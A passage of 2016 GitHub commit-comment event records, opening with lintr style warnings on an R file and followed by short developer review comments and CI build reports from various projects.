~^~\n```\n[R/drawLocal.R:65:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L65) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx1)) {\n          ^\n```\n[R/drawLocal.R:66:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                     ^\n```\n[R/drawLocal.R:66:23:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                      ^\n```\n[R/drawLocal.R:66:25:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                       ~^~\n```\n[R/drawLocal.R:66:28:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                          ~^~~\n```\n[R/drawLocal.R:66:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                             ^\n```\n[R/drawLocal.R:66:31:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                              ^\n```\n[R/drawLocal.R:66:33:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                               ~^~~\n```\n[R/drawLocal.R:67:35:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n                                  ^\n```\n[R/drawLocal.R:68:29:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                            ^\n```\n[R/drawLocal.R:68:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                             ^\n```\n[R/drawLocal.R:68:32:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                              ~^~~\n```\n[R/drawLocal.R:69:31:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t      y[idx1] = 0;\n                              ^\n```\n[R/drawLocal.R:70:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n                             ^\n```\n[R/drawLocal.R:70:32:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n                              ~^~~\n```\n[R/drawLocal.R:71:35:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = Inf;\n                                  ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L74) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidxp = which((x>0)&(x<1));\n             ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n            ~^~\n```\n[R/drawLocal.R:74:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                     ^\n```\n[R/drawLocal.R:74:24:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                      ~^~\n```\n[R/drawLocal.R:74:27:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                         ~^~\n```\n[R/drawLocal.R:74:28:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                           ^\n```\n[R/drawLocal.R:75:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​\txx=x[idxp];\n          ^\n```\n[R/drawLocal.R:75:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\txx=x[idxp];\n         ~^~\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L76) *style:* **Use <-, not =, for assignment.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n            ^\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n           ~^~\n```\n[R/drawLocal.R:76:23:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                     ~^~\n```\n[R/drawLocal.R:76:34:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                                ~^~\n```\n[R/drawLocal.R:77:27:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                         ~^~\n```\n[R/drawLocal.R:77:41:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                       ~^~\n```\n[R/drawLocal.R:77:45:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                           ~^\n```\n[R/drawLocal.R:78:27:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                         ~^~\n```\n[R/drawLocal.R:78:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                            ~^~\n```\n[R/drawLocal.R:78:34:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                                ~^~\n```\n[R/drawLocal.R:79:27:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                         ~^~\n```\n[R/drawLocal.R:79:28:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L79) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                           ^\n```\n[R/drawLocal.R:79:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                            ~^~\n```\n[R/drawLocal.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                ~^~\n```\n[R/drawLocal.R:79:36:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                  ~^~\n```\n[R/drawLocal.R:79:39:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                     ~^~\n```\n[R/drawLocal.R:80:19:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                  ^\n```\n[R/drawLocal.R:80:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                    ~^~\n```\n[R/drawLocal.R:80:25:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                       ~^~\n```\n[R/drawLocal.R:81:17:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L81) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty[idxp] = aux;\n                ^\n```\n[R/drawLocal.R:85:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n^~~~~~~~~~~~~\n```\n[R/drawLocal.R:85:33:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                ^\n```\n[R/drawLocal.R:85:41:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                        ^\n```\n[R/drawLocal.R:85:49:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                                ^\n```\n[R/drawLocal.R:85:52:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                                   ^\n```\n[R/drawLocal.R:87:5:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L87) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = JX + JY;\n    ^\n```\n[R/drawLocal.R:91:6:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L91) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n     ^\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n       ^~~~~\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L91) *warning:* **no visible global function definition for ‘getPX’, Did you mean 'setPS'?**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n       ^~~~~\n```\n[R/drawLocal.R:91:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L91) *style:* **Commas should always have a space after.**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n                   ^\n```\n"}},"created_at":"2016-09-22T09:28:16Z"}
{"id":"4601330402","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/woodlands-mediation"},"payload":{"comment":{"id":19127222,"position":65,"line":125,"path":"site/about/index.html","commit_id":"16e70c6fe8bd5e92a4b892d775ab57f64561b2ef","created_at":"2016-09-22T09:28:20Z","updated_at":"2016-09-22T09:28:20Z","body":"`https` please!"}},"created_at":"2016-09-22T09:28:20Z"}
{"id":"4601331947","type":"CommitCommentEvent","actor":{"login":"DenisWu"},"repo":{"name":"DenisWu/Denis_Repository"},"payload":{"comment":{"id":19127225,"position":null,"line":null,"path":null,"commit_id":"3a2f4ca99c9662b7b86e175d179e834525442fd0","created_at":"2016-09-22T09:28:40Z","updated_at":"2016-09-22T09:28:40Z","body":"Readme"}},"created_at":"2016-09-22T09:28:40Z"}
{"id":"4601332013","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127226,"position":10,"line":8,"path":"examples/plugins/README.md","commit_id":"862e325930552703bddb0853ebc5d1dd328f72e5","created_at":"2016-09-22T09:28:41Z","updated_at":"2016-09-22T09:28:41Z","body":"broken link, but it will be fixed when rebased on the other branch"}},"created_at":"2016-09-22T09:28:41Z"}
{"id":"4601334838","type":"CommitCommentEvent","actor":{"login":"maitianyihu"},"repo":{"name":"maitianyihu/crysadm"},"payload":{"comment":{"id":19127230,"position":null,"line":null,"path":null,"commit_id":"90c4afe80b8f4b190924283ee3bdb18b25059e48","created_at":"2016-09-22T09:29:16Z","updated_at":"2016-09-22T09:29:16Z","body":"\r\n[readme.txt](https://github.com/maitianyihu/crysadm/files/486892/readme.txt)\r\n\r\n\r\n"}},"created_at":"2016-09-22T09:29:16Z"}
{"id":"4601337475","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19127239,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T09:29:50Z","updated_at":"2016-09-22T09:29:50Z","body":"@sijskes how did you  asm.lst generated?"}},"created_at":"2016-09-22T09:29:50Z"}
{"id":"4601338533","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19127242,"position":null,"line":null,"path":null,"commit_id":"469428409fd2cee57205b8d37b8657a7115a6035","created_at":"2016-09-22T09:30:03Z","updated_at":"2016-09-22T09:30:03Z","body":"I somebody with an iDevice comes along, he can do that."}},"created_at":"2016-09-22T09:30:03Z"}
{"id":"4601339925","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127243,"position":null,"line":null,"path":null,"commit_id":"862e325930552703bddb0853ebc5d1dd328f72e5","created_at":"2016-09-22T09:30:20Z","updated_at":"2016-09-22T09:30:20Z","body":"Is examples/plugins/imgs/plugins.png used somewhere?"}},"created_at":"2016-09-22T09:30:20Z"}
{"id":"4601342523","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19127246,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T09:30:52Z","updated_at":"2016-09-22T09:30:52Z","body":"I also think it's better to keep the gateware version for SPI since the core is working fine, is really flexible (all SPI parameters are configurable) and won't use that much ressources compared to the others cores in this design."}},"created_at":"2016-09-22T09:30:52Z"}
{"id":"4601344313","type":"CommitCommentEvent","actor":{"login":"neoxic"},"repo":{"name":"mongodb-labs/mongorover"},"payload":{"comment":{"id":19127248,"position":89,"line":118,"path":"c_wrapper/lua-bson.c","commit_id":"b1ca42bf0b858d8b472640896d1ee07912e51b26","created_at":"2016-09-22T09:31:12Z","updated_at":"2016-09-22T09:31:12Z","body":"In case when control reaches this statement, this function leaves a key value on the stack (popping just one value with the previous `lua_pop(L, 1)` statement). This means this function __modifies__ the stack in some cases. Please also note that it returns `-1` whilst being declared `bool`."}},"created_at":"2016-09-22T09:31:12Z"}
{"id":"4601344640","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127249,"position":10,"line":8,"path":"examples/plugins/README.md","commit_id":"862e325930552703bddb0853ebc5d1dd328f72e5","created_at":"2016-09-22T09:31:15Z","updated_at":"2016-09-22T09:31:15Z","body":"Yes, it will be valid then"}},"created_at":"2016-09-22T09:31:15Z"}
{"id":"4601345699","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127251,"position":null,"line":null,"path":null,"commit_id":"6974dab924fc0e697849ad36227d87d689223f54","created_at":"2016-09-22T09:31:29Z","updated_at":"2016-09-22T09:31:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1097](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13857&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 246, ignored: 3 Build time: 00:09:34"}},"created_at":"2016-09-22T09:31:29Z"}
{"id":"4601347996","type":"CommitCommentEvent","actor":{"login":"bjanssen"},"repo":{"name":"votchallenge/vot-toolkit"},"payload":{"comment":{"id":19127255,"position":null,"line":null,"path":null,"commit_id":"75238a99b371b8911d46cde9dde4a92a8e42d919","created_at":"2016-09-22T09:31:57Z","updated_at":"2016-09-22T09:31:57Z","body":"In Octave 4.0 this is a built-in function, @ihpdep is this function not available in Matlab?"}},"created_at":"2016-09-22T09:31:57Z"}
{"id":"4601352861","type":"CommitCommentEvent","actor":{"login":"wisenmini"},"repo":{"name":"shinchiro/shinchiro-encodes"},"payload":{"comment":{"id":19127263,"position":null,"line":null,"path":null,"commit_id":"835362bcc6e082efd422c21c4251252280a94269","created_at":"2016-09-22T09:32:57Z","updated_at":"2016-09-22T09:32:57Z","body":"I lost all my bookmarks and history, I only found this Github because of your Megadownloader program lol..."}},"created_at":"2016-09-22T09:32:57Z"}
{"id":"4601353834","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19127265,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T09:33:10Z","updated_at":"2016-09-22T09:33:10Z","body":"in radare:\r\nmake sure the pointer is at start of file (normal action makefile)\r\npd $s >asm.lst"}},"created_at":"2016-09-22T09:33:10Z"}
{"id":"4601354650","type":"CommitCommentEvent","actor":{"login":"YOUflyme"},"repo":{"name":"YOUflyme/sort"},"payload":{"comment":{"id":19127269,"position":2,"line":2,"path":"README.md","commit_id":"f7348227c219611f6b72f12f75fe4549517956de","created_at":"2016-09-22T09:33:21Z","updated_at":"2016-09-22T09:33:21Z","body":"Description of the following code"}},"created_at":"2016-09-22T09:33:21Z"}
{"id":"4601358547","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19127280,"position":20,"line":32,"path":"src/FileDocument.java","commit_id":"6519ddf4fb8a94f5340adc28eec749f5e5cc9be8","created_at":"2016-09-22T09:34:09Z","updated_at":"2016-09-22T09:34:09Z","body":"@AntonLubushko lets try to make use of try-with-resource instead of closing channel manually, here and for the write method"}},"created_at":"2016-09-22T09:34:09Z"}
{"id":"4601365063","type":"CommitCommentEvent","actor":{"login":"cdeil"},"repo":{"name":"adonath/gammapy"},"payload":{"comment":{"id":19127286,"position":null,"line":null,"path":null,"commit_id":"3ea3286a6c2815b77bc7e9883b77a35cfbed2e86","created_at":"2016-09-22T09:35:31Z","updated_at":"2016-09-22T09:35:31Z","body":"@adonath - Commit messages like \"Address comments by @cdeil\" aren't very helpful in the commit log.\r\n\r\nSomething like \"Improve ring background code\" is better, or if you think it's important to note in the log that this is in response to feedback, then \"Improve ring background based on comments by @cdeil\"."}},"created_at":"2016-09-22T09:35:31Z"}
{"id":"4601366916","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127293,"position":null,"line":null,"path":null,"commit_id":"862e325930552703bddb0853ebc5d1dd328f72e5","created_at":"2016-09-22T09:35:55Z","updated_at":"2016-09-22T09:35:55Z","body":"> Is examples/plugins/imgs/plugins.png used somewhere?\r\n\r\nThis should not be here anymore"}},"created_at":"2016-09-22T09:35:55Z"}
{"id":"4601369208","type":"CommitCommentEvent","actor":{"login":"ihpdep"},"repo":{"name":"votchallenge/vot-toolkit"},"payload":{"comment":{"id":19127300,"position":null,"line":null,"path":null,"commit_id":"75238a99b371b8911d46cde9dde4a92a8e42d919","created_at":"2016-09-22T09:36:25Z","updated_at":"2016-09-22T09:36:25Z","body":"No, it is not available in Matlab  R2016a."}},"created_at":"2016-09-22T09:36:25Z"}
{"id":"4601369630","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127301,"position":null,"line":null,"path":null,"commit_id":"085107be625dcca5bd9d362d0013f42cfc0cad7d","created_at":"2016-09-22T09:36:31Z","updated_at":"2016-09-22T09:36:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1099](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13861&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 222, ignored: 3 Build time: 00:08:39\n### Failed tests\n```\norg.genivi.sota.core.ImpactResourceSpec.calculates impact for a blacklist item: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T09:36:31Z"}
{"id":"4601370352","type":"CommitCommentEvent","actor":{"login":"rgrig"},"repo":{"name":"emeryberger/CSrankings"},"payload":{"comment":{"id":19127302,"position":null,"line":null,"path":null,"commit_id":"54de9a3dd1cc11dac87141df78712d26a1beeb47","created_at":"2016-09-22T09:36:41Z","updated_at":"2016-09-22T09:36:41Z","body":"Consider floor -> round. Now the \"total count\" **looks** way more than the sum of \"adjusted counts\"."}},"created_at":"2016-09-22T09:36:41Z"}
{"id":"4601370650","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127303,"position":null,"line":null,"path":null,"commit_id":"75d069d883f5fe2a48132cf058d3b4527b3baffb","created_at":"2016-09-22T09:36:44Z","updated_at":"2016-09-22T09:36:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1100](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13862&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:08:52"}},"created_at":"2016-09-22T09:36:44Z"}
{"id":"4601371478","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127305,"position":null,"line":null,"path":null,"commit_id":"a1be64caba2eedb46e8fe15c0081c33aac767049","created_at":"2016-09-22T09:36:55Z","updated_at":"2016-09-22T09:36:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1098](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13860&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:03"}},"created_at":"2016-09-22T09:36:55Z"}
{"id":"4601383309","type":"CommitCommentEvent","actor":{"login":"m-mokhtari"},"repo":{"name":"gator-life/gator.life"},"payload":{"comment":{"id":19127335,"position":6,"line":107,"path":"src/server/server/dal.py","commit_id":"84ee7e225e3cb40de773da53847a4b838983a530","created_at":"2016-09-22T09:39:31Z","updated_at":"2016-09-22T09:39:31Z","body":"Remove the new line"}},"created_at":"2016-09-22T09:39:31Z"}
{"id":"4601392556","type":"CommitCommentEvent","actor":{"login":"ojw28"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":19127352,"position":null,"line":null,"path":null,"commit_id":"42e10c762543b2bdcb5517ab5fdfd583a59a479d","created_at":"2016-09-22T09:41:24Z","updated_at":"2016-09-22T09:41:24Z","body":"Still hangs for us with that combination :(. Could you reproduce the hang using 2.1.3, and were you trying with the command in the commit message of this change?"}},"created_at":"2016-09-22T09:41:24Z"}
{"id":"4601398651","type":"CommitCommentEvent","actor":{"login":"m-mokhtari"},"repo":{"name":"gator-life/gator.life"},"payload":{"comment":{"id":19127370,"position":15,"line":11,"path":"src/server/server/frontendstructs.py","commit_id":"84ee7e225e3cb40de773da53847a4b838983a530","created_at":"2016-09-22T09:42:46Z","updated_at":"2016-09-22T09:42:46Z","body":"Docstring not added for url_hash"}},"created_at":"2016-09-22T09:42:46Z"}
{"id":"4601400427","type":"CommitCommentEvent","actor":{"login":"mangui"},"repo":{"name":"dailymotion/hls.js"},"payload":{"comment":{"id":19127379,"position":null,"line":null,"path":null,"commit_id":"961b5e67f8d998266a11898a6d860f13bdbfaf7f","created_at":"2016-09-22T09:43:08Z","updated_at":"2016-09-22T09:43:08Z","body":"@uldza I am currently trying to fix the latest glitches on https://github.com/dailymotion/hls.js/issues/600 before releasing.\r\nwhile investigating this ticket, I found other issues in NAL parsing. I fixed one locally but I am struggling on the second one.\r\nstay tuned"}},"created_at":"2016-09-22T09:43:08Z"}
{"id":"4601401729","type":"CommitCommentEvent","actor":{"login":"luis-pereira"},"repo":{"name":"pvanek/qlipper"},"payload":{"comment":{"id":19127381,"position":null,"line":null,"path":null,"commit_id":"0862db2ecd029cf3482d05f66efab311b3f3725b","created_at":"2016-09-22T09:43:26Z","updated_at":"2016-09-22T09:43:26Z","body":"@palinek I found a way to use Arch on Travis. I'm experimentating with it on my fork of libqtxdg and it's working nicelly. "}},"created_at":"2016-09-22T09:43:26Z"}
